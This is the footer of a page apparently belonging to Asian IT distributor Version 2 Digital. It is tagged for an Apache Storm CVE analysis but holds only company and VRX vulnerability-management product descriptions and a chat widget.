#apache #storm #cve #analysis

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×